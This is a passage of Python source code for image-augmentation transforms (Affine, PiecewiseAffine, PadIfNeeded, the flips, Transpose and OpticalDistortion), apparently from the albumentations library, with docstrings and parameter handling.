or dict): Scaling factor to use, where ``1.0`` denotes \"no change\" and\n ``0.5`` is zoomed out to ``50`` percent of the original size.\n * If a single number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``.\n That the same range will be used for both x- and y-axis. To keep the aspect ratio, set\n ``keep_ratio=True``, then the same value will be used for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes. Note that when\n the ``keep_ratio=True``, the x- and y-axis ranges should be the same.\n translate_percent (None, number, tuple of number or dict): Translation as a fraction of the image height/width\n (x-translation, y-translation), where ``0`` denotes \"no change\"\n and ``0.5`` denotes \"half of the axis size\".\n * If ``None`` then equivalent to ``0.0`` unless `translate_px` has a value other than ``None``.\n * If a single number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``.\n That sampled fraction value will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n translate_px (None, int, tuple of int or dict): Translation in pixels.\n * If ``None`` then equivalent to ``0`` unless `translate_percent` has a value other than ``None``.\n * If a single int, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from\n the discrete interval ``[a..b]``. That number will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n rotate (number or tuple of number): Rotation in degrees (**NOT** radians), i.e. expected value range is\n around ``[-360, 360]``. Rotation happens around the *center* of the image,\n not the top left corner as in some other frameworks.\n * If a number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``\n and used as the rotation value.\n shear (number, tuple of number or dict): Shear in degrees (**NOT** radians), i.e. expected value range is\n around ``[-360, 360]``, with reasonable values being in the range of ``[-45, 45]``.\n * If a number, then that value will be used for all images as\n the shear on the x-axis (no shear on the y-axis will be done).\n * If a tuple ``(a, b)``, then two value will be uniformly sampled per image\n from the interval ``[a, b]`` and be used as the x- and y-shear value.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n interpolation (int): OpenCV interpolation flag.\n mask_interpolation (int): OpenCV interpolation flag.\n cval (number or sequence of number): The constant value to use when filling in newly created pixels.\n (E.g. translating by 1px to the right will create a new 1px-wide column of pixels\n on the left of the image).\n The value is only used when `mode=constant`. The expected value range is ``[0, 255]`` for ``uint8`` images.\n cval_mask (number or tuple of number): Same as cval but only for masks.\n mode (int): OpenCV border flag.\n fit_output (bool): If True, the image plane size and position will be adjusted to tightly capture\n the whole image after affine transformation (`translate_percent` and `translate_px` are ignored).\n Otherwise (``False``), parts of the transformed image may end up outside the image plane.\n Fitting the output shape can be useful to avoid corners of the image being outside the image plane\n after applying rotations. Default: False\n keep_ratio (bool): When True, the original aspect ratio will be kept when the random scale is applied.\n Default: False.\n rotate_method (str): rotation method used for the bounding boxes. Should be one of \"largest_box\" or\n \"ellipse\"[1].\n Default: \"largest_box\"\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n\n Reference:\n [1] https://arxiv.org/abs/2109.13488\n \"\"\"\n\n def __init__(\n self,\n scale: Optional[Union[float, Sequence[float], dict]] = None,\n translate_percent: Optional[Union[float, Sequence[float], dict]] = None,\n translate_px: Optional[Union[int, Sequence[int], dict]] = None,\n rotate: Optional[Union[float, Sequence[float]]] = None,\n shear: Optional[Union[float, Sequence[float], dict]] = None,\n interpolation: int = cv2.INTER_LINEAR,\n mask_interpolation: int = cv2.INTER_NEAREST,\n cval: Union[int, float, Sequence[int], Sequence[float]] = 0,\n cval_mask: Union[int, float, Sequence[int], Sequence[float]] = 0,\n mode: int = cv2.BORDER_CONSTANT,\n fit_output: bool = False,\n keep_ratio: bool = False,\n rotate_method: str = \"largest_box\",\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super().__init__(always_apply=always_apply, p=p)\n\n params = [scale, translate_percent, translate_px, rotate, shear]\n if all([p is None for p in params]):\n scale = {\"x\": (0.9, 1.1), \"y\": (0.9, 1.1)}\n translate_percent = {\"x\": (-0.1, 0.1), \"y\": (-0.1, 0.1)}\n rotate = (-15, 15)\n shear = {\"x\": (-10, 10), \"y\": (-10, 10)}\n else:\n scale = scale if scale is not None else 1.0\n rotate = rotate if rotate is not None else 0.0\n shear = shear if shear is not None else 0.0\n\n self.interpolation = interpolation\n self.mask_interpolation = mask_interpolation\n self.cval = cval\n self.cval_mask = cval_mask\n self.mode = mode\n self.scale = self._handle_dict_arg(scale, \"scale\")\n self.translate_percent, self.translate_px = self._handle_translate_arg(translate_px, translate_percent)\n self.rotate = to_tuple(rotate, rotate)\n self.fit_output = fit_output\n self.shear = self._handle_dict_arg(shear, \"shear\")\n self.keep_ratio = keep_ratio\n self.rotate_method = rotate_method\n\n if self.keep_ratio and self.scale[\"x\"] != self.scale[\"y\"]:\n raise ValueError(\n \"When keep_ratio is True, the x and y scale range should be identical. got {}\".format(self.scale)\n )\n\n def get_transform_init_args_names(self):\n return (\n \"interpolation\",\n \"mask_interpolation\",\n \"cval\",\n \"mode\",\n \"scale\",\n \"translate_percent\",\n \"translate_px\",\n \"rotate\",\n \"fit_output\",\n \"shear\",\n \"cval_mask\",\n \"keep_ratio\",\n \"rotate_method\",\n )\n\n @staticmethod\n def _handle_dict_arg(val: Union[float, Sequence[float], dict], name: str, default: float = 1.0):\n if isinstance(val, dict):\n if \"x\" not in val and \"y\" not in val:\n raise ValueError(\n f'Expected {name} dictionary to contain at least key \"x\" or ' 'key \"y\". Found neither of them.'\n )\n x = val.get(\"x\", default)\n y = val.get(\"y\", default)\n return {\"x\": to_tuple(x, x), \"y\": to_tuple(y, y)}\n return {\"x\": to_tuple(val, val), \"y\": to_tuple(val, val)}\n\n @classmethod\n def _handle_translate_arg(\n cls,\n translate_px: Optional[Union[float, Sequence[float], dict]],\n translate_percent: Optional[Union[float, Sequence[float], dict]],\n ):\n if translate_percent is None and translate_px is None:\n translate_px = 0\n\n if translate_percent is not None and translate_px is not None:\n raise ValueError(\n \"Expected either translate_percent or translate_px to be \" \"provided, \" \"but neither of them was.\"\n )\n\n if translate_percent is not None:\n # translate by percent\n return cls._handle_dict_arg(translate_percent, \"translate_percent\", default=0.0), translate_px\n\n if translate_px is None:\n raise ValueError(\"translate_px is None.\")\n # translate by pixels\n return translate_percent, cls._handle_dict_arg(translate_px, \"translate_px\")\n\n def apply(\n self,\n img: np.ndarray,\n matrix: skimage.transform.ProjectiveTransform = None,\n output_shape: Sequence[int] = (),\n **params\n ) -> np.ndarray:\n return F.warp_affine(\n img,\n matrix,\n interpolation=self.interpolation,\n cval=self.cval,\n mode=self.mode,\n output_shape=output_shape,\n )\n\n def apply_to_mask(\n self,\n img: np.ndarray,\n matrix: skimage.transform.ProjectiveTransform = None,\n output_shape: Sequence[int] = (),\n **params\n ) -> np.ndarray:\n return F.warp_affine(\n img,\n matrix,\n interpolation=self.mask_interpolation,\n cval=self.cval_mask,\n mode=self.mode,\n output_shape=output_shape,\n )\n\n def apply_to_bbox(\n self,\n bbox: BoxInternalType,\n matrix: skimage.transform.ProjectiveTransform = None,\n rows: int = 0,\n cols: int = 0,\n output_shape: Sequence[int] = (),\n **params\n ) -> BoxInternalType:\n return F.bbox_affine(bbox, matrix, self.rotate_method, rows, cols, output_shape)\n\n def apply_to_keypoint(\n self,\n keypoint: KeypointInternalType,\n matrix: Optional[skimage.transform.ProjectiveTransform] = None,\n scale: Optional[dict] = None,\n **params\n ) -> KeypointInternalType:\n assert scale is not None and matrix is not None\n return F.keypoint_affine(keypoint, matrix=matrix, scale=scale)\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params: dict) -> dict:\n h, w = params[\"image\"].shape[:2]\n\n translate: Dict[str, Union[int, float]]\n if self.translate_px is not None:\n translate = {key: random.randint(*value) for key, value in self.translate_px.items()}\n elif self.translate_percent is not None:\n translate = {key: random.uniform(*value) for key, value in self.translate_percent.items()}\n translate[\"x\"] = translate[\"x\"] * w\n translate[\"y\"] = translate[\"y\"] * h\n else:\n translate = {\"x\": 0, \"y\": 0}\n\n # Look to issue https://github.com/albumentations-team/albumentations/issues/1079\n shear = {key: -random.uniform(*value) for key, value in self.shear.items()}\n scale = {key: random.uniform(*value) for key, value in self.scale.items()}\n if self.keep_ratio:\n scale[\"y\"] = scale[\"x\"]\n\n # Look to issue https://github.com/albumentations-team/albumentations/issues/1079\n rotate = -random.uniform(*self.rotate)\n\n # for images we use additional shifts of (0.5, 0.5) as otherwise\n # we get an ugly black border for 90deg rotations\n shift_x = w / 2 - 0.5\n shift_y = h / 2 - 0.5\n\n matrix_to_topleft = skimage.transform.SimilarityTransform(translation=[-shift_x, -shift_y])\n matrix_shear_y_rot = skimage.transform.AffineTransform(rotation=-np.pi / 2)\n matrix_shear_y = skimage.transform.AffineTransform(shear=np.deg2rad(shear[\"y\"]))\n matrix_shear_y_rot_inv = skimage.transform.AffineTransform(rotation=np.pi / 2)\n matrix_transforms = skimage.transform.AffineTransform(\n scale=(scale[\"x\"], scale[\"y\"]),\n translation=(translate[\"x\"], translate[\"y\"]),\n rotation=np.deg2rad(rotate),\n shear=np.deg2rad(shear[\"x\"]),\n )\n matrix_to_center = skimage.transform.SimilarityTransform(translation=[shift_x, shift_y])\n matrix = (\n matrix_to_topleft\n + matrix_shear_y_rot\n + matrix_shear_y\n + matrix_shear_y_rot_inv\n + matrix_transforms\n + matrix_to_center\n )\n if self.fit_output:\n matrix, output_shape = self._compute_affine_warp_output_shape(matrix, params[\"image\"].shape)\n else:\n output_shape = params[\"image\"].shape\n\n return {\n \"rotate\": rotate,\n \"scale\": scale,\n \"matrix\": matrix,\n \"output_shape\": output_shape,\n }\n\n @staticmethod\n def _compute_affine_warp_output_shape(\n matrix: skimage.transform.ProjectiveTransform, input_shape: Sequence[int]\n ) -> Tuple[skimage.transform.ProjectiveTransform, Sequence[int]]:\n height, width = input_shape[:2]\n\n if height == 0 or width == 0:\n return matrix, input_shape\n\n # determine shape of output image\n corners = np.array([[0, 0], [0, height - 1], [width - 1, height - 1], [width - 1, 0]])\n corners = matrix(corners)\n minc = corners[:, 0].min()\n minr = corners[:, 1].min()\n maxc = corners[:, 0].max()\n maxr = corners[:, 1].max()\n out_height = maxr - minr + 1\n out_width = maxc - minc + 1\n if len(input_shape) == 3:\n output_shape = np.ceil((out_height, out_width, input_shape[2]))\n else:\n output_shape = np.ceil((out_height, out_width))\n output_shape_tuple = tuple([int(v) for v in output_shape.tolist()])\n # fit output image in new shape\n translation = (-minc, -minr)\n matrix_to_fit = skimage.transform.SimilarityTransform(translation=translation)\n matrix = matrix + matrix_to_fit\n return matrix, output_shape_tuple\n\n\nclass PiecewiseAffine(DualTransform):\n \"\"\"Apply affine transformations that differ between local neighbourhoods.\n This augmentation places a regular grid of points on an image and randomly moves the neighbourhood of these point\n around via affine transformations. This leads to local distortions.\n\n This is mostly a wrapper around scikit-image's ``PiecewiseAffine``.\n See also ``Affine`` for a similar technique.\n\n Note:\n This augmenter is very slow. Try to use ``ElasticTransformation`` instead, which is at least 10x faster.\n\n Note:\n For coordinate-based inputs (keypoints, bounding boxes, polygons, ...),\n this augmenter still has to perform an image-based augmentation,\n which will make it significantly slower and not fully correct for such inputs than other transforms.\n\n Args:\n scale (float, tuple of float): Each point on the regular grid is moved around via a normal distribution.\n This scale factor is equivalent to the normal distribution's sigma.\n Note that the jitter (how far each point is moved in which direction) is multiplied by the height/width of\n the image if ``absolute_scale=False`` (default), so this scale can be the same for different sized images.\n Recommended values are in the range ``0.01`` to ``0.05`` (weak to strong augmentations).\n * If a single ``float``, then that value will always be used as the scale.\n * If a tuple ``(a, b)`` of ``float`` s, then a random value will\n be uniformly sampled per image from the interval ``[a, b]``.\n nb_rows (int, tuple of int): Number of rows of points that the regular grid should have.\n Must be at least ``2``. For large images, you might want to pick a higher value than ``4``.\n You might have to then adjust scale to lower values.\n * If a single ``int``, then that value will always be used as the number of rows.\n * If a tuple ``(a, b)``, then a value from the discrete interval\n ``[a..b]`` will be uniformly sampled per image.\n nb_cols (int, tuple of int): Number of columns. Analogous to `nb_rows`.\n interpolation (int): The order of interpolation. The order has to be in the range 0-5:\n - 0: Nearest-neighbor\n - 1: Bi-linear (default)\n - 2: Bi-quadratic\n - 3: Bi-cubic\n - 4: Bi-quartic\n - 5: Bi-quintic\n mask_interpolation (int): same as interpolation but for mask.\n cval (number): The constant value to use when filling in newly created pixels.\n cval_mask (number): Same as cval but only for masks.\n mode (str): {'constant', 'edge', 'symmetric', 'reflect', 'wrap'}, optional\n Points outside the boundaries of the input are filled according\n to the given mode. Modes match the behaviour of `numpy.pad`.\n absolute_scale (bool): Take `scale` as an absolute value rather than a relative value.\n keypoints_threshold (float): Used as threshold in conversion from distance maps to keypoints.\n The search for keypoints works by searching for the\n argmin (non-inverted) or argmax (inverted) in each channel. This\n parameters contains the maximum (non-inverted) or minimum (inverted) value to accept in order to view a hit\n as a keypoint. Use ``None`` to use no min/max. Default: 0.01\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n\n \"\"\"\n\n def __init__(\n self,\n scale: ScaleFloatType = (0.03, 0.05),\n nb_rows: Union[int, Sequence[int]] = 4,\n nb_cols: Union[int, Sequence[int]] = 4,\n interpolation: int = 1,\n mask_interpolation: int = 0,\n cval: int = 0,\n cval_mask: int = 0,\n mode: str = \"constant\",\n absolute_scale: bool = False,\n always_apply: bool = False,\n keypoints_threshold: float = 0.01,\n p: float = 0.5,\n ):\n super(PiecewiseAffine, self).__init__(always_apply, p)\n\n self.scale = to_tuple(scale, scale)\n self.nb_rows = to_tuple(nb_rows, nb_rows)\n self.nb_cols = to_tuple(nb_cols, nb_cols)\n self.interpolation = interpolation\n self.mask_interpolation = mask_interpolation\n self.cval = cval\n self.cval_mask = cval_mask\n self.mode = mode\n self.absolute_scale = absolute_scale\n self.keypoints_threshold = keypoints_threshold\n\n def get_transform_init_args_names(self):\n return (\n \"scale\",\n \"nb_rows\",\n \"nb_cols\",\n \"interpolation\",\n \"mask_interpolation\",\n \"cval\",\n \"cval_mask\",\n \"mode\",\n \"absolute_scale\",\n \"keypoints_threshold\",\n )\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params) -> dict:\n h, w = params[\"image\"].shape[:2]\n\n nb_rows = np.clip(random.randint(*self.nb_rows), 2, None)\n nb_cols = np.clip(random.randint(*self.nb_cols), 2, None)\n nb_cells = nb_cols * nb_rows\n scale = random.uniform(*self.scale)\n\n jitter: np.ndarray = random_utils.normal(0, scale, (nb_cells, 2))\n if not np.any(jitter > 0):\n return {\"matrix\": None}\n\n y = np.linspace(0, h, nb_rows)\n x = np.linspace(0, w, nb_cols)\n\n # (H, W) and (H, W) for H=rows, W=cols\n xx_src, yy_src = np.meshgrid(x, y)\n\n # (1, HW, 2) => (HW, 2) for H=rows, W=cols\n points_src = np.dstack([yy_src.flat, xx_src.flat])[0]\n\n if self.absolute_scale:\n jitter[:, 0] = jitter[:, 0] / h if h > 0 else 0.0\n jitter[:, 1] = jitter[:, 1] / w if w > 0 else 0.0\n\n jitter[:, 0] = jitter[:, 0] * h\n jitter[:, 1] = jitter[:, 1] * w\n\n points_dest = np.copy(points_src)\n points_dest[:, 0] = points_dest[:, 0] + jitter[:, 0]\n points_dest[:, 1] = points_dest[:, 1] + jitter[:, 1]\n\n # Restrict all destination points to be inside the image plane.\n # This is necessary, as otherwise keypoints could be augmented\n # outside of the image plane and these would be replaced by\n # (-1, -1), which would not conform with the behaviour of the other augmenters.\n points_dest[:, 0] = np.clip(points_dest[:, 0], 0, h - 1)\n points_dest[:, 1] = np.clip(points_dest[:, 1], 0, w - 1)\n\n matrix = skimage.transform.PiecewiseAffineTransform()\n matrix.estimate(points_src[:, ::-1], points_dest[:, ::-1])\n\n return {\n \"matrix\": matrix,\n }\n\n def apply(self, img: np.ndarray, matrix: skimage.transform.PiecewiseAffineTransform = None, **params) -> np.ndarray:\n return F.piecewise_affine(img, matrix, self.interpolation, self.mode, self.cval)\n\n def apply_to_mask(\n self, img: np.ndarray, matrix: skimage.transform.PiecewiseAffineTransform = None, **params\n ) -> np.ndarray:\n return F.piecewise_affine(img, matrix, self.mask_interpolation, self.mode, self.cval_mask)\n\n def apply_to_bbox(\n self,\n bbox: BoxInternalType,\n rows: int = 0,\n cols: int = 0,\n matrix: skimage.transform.PiecewiseAffineTransform = None,\n **params\n ) -> BoxInternalType:\n return F.bbox_piecewise_affine(bbox, matrix, rows, cols, self.keypoints_threshold)\n\n def apply_to_keypoint(\n self,\n keypoint: KeypointInternalType,\n rows: int = 0,\n cols: int = 0,\n matrix: skimage.transform.PiecewiseAffineTransform = None,\n **params\n ):\n return F.keypoint_piecewise_affine(keypoint, matrix, rows, cols, self.keypoints_threshold)\n\n\nclass PadIfNeeded(DualTransform):\n \"\"\"Pad side of the image / max if side is less than desired number.\n\n Args:\n min_height (int): minimal result image height.\n min_width (int): minimal result image width.\n pad_height_divisor (int): if not None, ensures image height is dividable by value of this argument.\n pad_width_divisor (int): if not None, ensures image width is dividable by value of this argument.\n position (Union[str, PositionType]): Position of the image. should be PositionType.CENTER or\n PositionType.TOP_LEFT or PositionType.TOP_RIGHT or PositionType.BOTTOM_LEFT or PositionType.BOTTOM_RIGHT.\n or PositionType.RANDOM. Default: PositionType.CENTER.\n border_mode (OpenCV flag): OpenCV border mode.\n value (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of int,\n list of float): padding value for mask if border_mode is cv2.BORDER_CONSTANT.\n p (float): probability of applying the transform. Default: 1.0.\n\n Targets:\n image, mask, bbox, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n class PositionType(Enum):\n CENTER = \"center\"\n TOP_LEFT = \"top_left\"\n TOP_RIGHT = \"top_right\"\n BOTTOM_LEFT = \"bottom_left\"\n BOTTOM_RIGHT = \"bottom_right\"\n RANDOM = \"random\"\n\n def __init__(\n self,\n min_height: Optional[int] = 1024,\n min_width: Optional[int] = 1024,\n pad_height_divisor: Optional[int] = None,\n pad_width_divisor: Optional[int] = None,\n position: Union[PositionType, str] = PositionType.CENTER,\n border_mode: int = cv2.BORDER_REFLECT_101,\n value: Optional[ImageColorType] = None,\n mask_value: Optional[ImageColorType] = None,\n always_apply: bool = False,\n p: float = 1.0,\n ):\n if (min_height is None) == (pad_height_divisor is None):\n raise ValueError(\"Only one of 'min_height' and 'pad_height_divisor' parameters must be set\")\n\n if (min_width is None) == (pad_width_divisor is None):\n raise ValueError(\"Only one of 'min_width' and 'pad_width_divisor' parameters must be set\")\n\n super(PadIfNeeded, self).__init__(always_apply, p)\n self.min_height = min_height\n self.min_width = min_width\n self.pad_width_divisor = pad_width_divisor\n self.pad_height_divisor = pad_height_divisor\n self.position = PadIfNeeded.PositionType(position)\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n\n def update_params(self, params, **kwargs):\n params = super(PadIfNeeded, self).update_params(params, **kwargs)\n rows = params[\"rows\"]\n cols = params[\"cols\"]\n\n if self.min_height is not None:\n if rows < self.min_height:\n h_pad_top = int((self.min_height - rows) / 2.0)\n h_pad_bottom = self.min_height - rows - h_pad_top\n else:\n h_pad_top = 0\n h_pad_bottom = 0\n else:\n pad_remained = rows % self.pad_height_divisor\n pad_rows = self.pad_height_divisor - pad_remained if pad_remained > 0 else 0\n\n h_pad_top = pad_rows // 2\n h_pad_bottom = pad_rows - h_pad_top\n\n if self.min_width is not None:\n if cols < self.min_width:\n w_pad_left = int((self.min_width - cols) / 2.0)\n w_pad_right = self.min_width - cols - w_pad_left\n else:\n w_pad_left = 0\n w_pad_right = 0\n else:\n pad_remainder = cols % self.pad_width_divisor\n pad_cols = self.pad_width_divisor - pad_remainder if pad_remainder > 0 else 0\n\n w_pad_left = pad_cols // 2\n w_pad_right = pad_cols - w_pad_left\n\n h_pad_top, h_pad_bottom, w_pad_left, w_pad_right = self.__update_position_params(\n h_top=h_pad_top, h_bottom=h_pad_bottom, w_left=w_pad_left, w_right=w_pad_right\n )\n\n params.update(\n {\n \"pad_top\": h_pad_top,\n \"pad_bottom\": h_pad_bottom,\n \"pad_left\": w_pad_left,\n \"pad_right\": w_pad_right,\n }\n )\n return params\n\n def apply(\n self, img: np.ndarray, pad_top: int = 0, pad_bottom: int = 0, pad_left: int = 0, pad_right: int = 0, **params\n ) -> np.ndarray:\n return F.pad_with_params(\n img,\n pad_top,\n pad_bottom,\n pad_left,\n pad_right,\n border_mode=self.border_mode,\n value=self.value,\n )\n\n def apply_to_mask(\n self, img: np.ndarray, pad_top: int = 0, pad_bottom: int = 0, pad_left: int = 0, pad_right: int = 0, **params\n ) -> np.ndarray:\n return F.pad_with_params(\n img,\n pad_top,\n pad_bottom,\n pad_left,\n pad_right,\n border_mode=self.border_mode,\n value=self.mask_value,\n )\n\n def apply_to_bbox(\n self,\n bbox: BoxInternalType,\n pad_top: int = 0,\n pad_bottom: int = 0,\n pad_left: int = 0,\n pad_right: int = 0,\n rows: int = 0,\n cols: int = 0,\n **params\n ) -> BoxInternalType:\n x_min, y_min, x_max, y_max = denormalize_bbox(bbox, rows, cols)[:4]\n bbox = x_min + pad_left, y_min + pad_top, x_max + pad_left, y_max + pad_top\n return normalize_bbox(bbox, rows + pad_top + pad_bottom, cols + pad_left + pad_right)\n\n def apply_to_keypoint(\n self,\n keypoint: KeypointInternalType,\n pad_top: int = 0,\n pad_bottom: int = 0,\n pad_left: int = 0,\n pad_right: int = 0,\n **params\n ) -> KeypointInternalType:\n x, y, angle, scale = keypoint[:4]\n return x + pad_left, y + pad_top, angle, scale\n\n def get_transform_init_args_names(self):\n return (\n \"min_height\",\n \"min_width\",\n \"pad_height_divisor\",\n \"pad_width_divisor\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n )\n\n def __update_position_params(\n self, h_top: int, h_bottom: int, w_left: int, w_right: int\n ) -> Tuple[int, int, int, int]:\n if self.position == PadIfNeeded.PositionType.TOP_LEFT:\n h_bottom += h_top\n w_right += w_left\n h_top = 0\n w_left = 0\n\n elif self.position == PadIfNeeded.PositionType.TOP_RIGHT:\n h_bottom += h_top\n w_left += w_right\n h_top = 0\n w_right = 0\n\n elif self.position == PadIfNeeded.PositionType.BOTTOM_LEFT:\n h_top += h_bottom\n w_right += w_left\n h_bottom = 0\n w_left = 0\n\n elif self.position == PadIfNeeded.PositionType.BOTTOM_RIGHT:\n h_top += h_bottom\n w_left += w_right\n h_bottom = 0\n w_right = 0\n\n elif self.position == PadIfNeeded.PositionType.RANDOM:\n h_pad = h_top + h_bottom\n w_pad = w_left + w_right\n h_top = random.randint(0, h_pad)\n h_bottom = h_pad - h_top\n w_left = random.randint(0, w_pad)\n w_right = w_pad - w_left\n\n return h_top, h_bottom, w_left, w_right\n\n\nclass VerticalFlip(DualTransform):\n \"\"\"Flip the input vertically around the x-axis.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, **params) -> np.ndarray:\n return F.vflip(img)\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_vflip(bbox, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_vflip(keypoint, **params)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass HorizontalFlip(DualTransform):\n \"\"\"Flip the input horizontally around the y-axis.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, **params) -> np.ndarray:\n if img.ndim == 3 and img.shape[2] > 1 and img.dtype == np.uint8:\n # Opencv is faster than numpy only in case of\n # non-gray scale 8bits images\n return F.hflip_cv2(img)\n\n return F.hflip(img)\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_hflip(bbox, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_hflip(keypoint, **params)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass Flip(DualTransform):\n \"\"\"Flip the input either horizontally, vertically or both horizontally and vertically.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, d: int = 0, **params) -> np.ndarray:\n \"\"\"Args:\n d (int): code that specifies how to flip the input. 0 for vertical flipping, 1 for horizontal flipping,\n -1 for both vertical and horizontal flipping (which is also could be seen as rotating the input by\n 180 degrees).\n \"\"\"\n return F.random_flip(img, d)\n\n def get_params(self):\n # Random int in the range [-1, 1]\n return {\"d\": random.randint(-1, 1)}\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_flip(bbox, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_flip(keypoint, **params)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass Transpose(DualTransform):\n \"\"\"Transpose the input by swapping rows and columns.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, **params) -> np.ndarray:\n return F.transpose(img)\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_transpose(bbox, 0, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_transpose(keypoint)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass OpticalDistortion(DualTransform):\n \"\"\"\n Args:\n distort_limit (float, (float, float)): If distort_limit is a single float, the range\n will be (-distort_limit, distort_limit). Default: (-0.05, 0.05).\n shift_limit (float, (float, float))): If shift_limit is a single float, the range\n will be (-shift_limit, shift_limit). Default: (-0.05, 0.05).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n\n Targets:\n image, mask, bbox\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n distort_limit: ScaleFloatType = 0.05,\n shift_limit: ScaleFloatType = 0.05,\n interpolation: int = cv2.INTER_LINEAR,\n border_mode: int = cv2.BORDER_REFLECT_101,\n value: Optional[ImageColorType] = None,\n mask_value: Optional[ImageColorType] = None,\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super(OpticalDistortion, self).__init__(always_apply, p)\n self.shift_limit = to_tuple(shift_limit)\n self.distort_limit = to_tuple(distort_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n\n def apply(\n self, img: np.ndarray, k: int = 0, dx: int = 0, dy: int = 0, interpolation: int = cv2.INTER_LINEAR, **params\n ) -> np.ndarray:\n return F.optical_distortion(img, k, dx, dy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img: np.ndarray, k: int = 0, dx: int = 0, dy: int = 0, **params) -> np.ndarray:\n return F.optical_distortion(img, k, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n\n def apply_to_bbox(self, bbox: BoxInternalType, k: int = 0, dx: int = 0, dy: int = 0, **params) -> BoxInternalType:\n rows, cols = params[\"rows\"], params[\"cols\"]\n mask = np.zeros((rows, cols), dtype=np.uint8)\n bbox_denorm = F.denormalize_bbox(bbox, rows, cols)\n x_min, y_min, x_max, y_max = bbox_denorm[:4]\n x_min, y_min, x_max, y_max = int(x_min), int(y_min), int(x_max), int(y_max)\n mask[y_min:y_max, x_min:x_max] = 1\n mask = F.optical_distortion(mask, k, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n bbox_returned = bbox_from_mask(mask)\n bbox_returned = F.normalize_bbox(bbox_returned, rows, cols)\n return bbox_returned\n\n def get_params(self):\n return {\n \"k\": random.uniform(self.distort_limit[0], self.distort_limit[1]),\n \"dx\": round(random.uniform(self.shift_limit[0], self.shift_limit[1])),\n \"dy\": round(random.uniform(self.shift_limit[0], self.shift_limit[1])),\n }\n\n def get_transform_init_args_names(self):\n return (\n \"distort_limit\",\n \"shift_limit\",\n \"interpolation\",\n \"border_mode\",\n 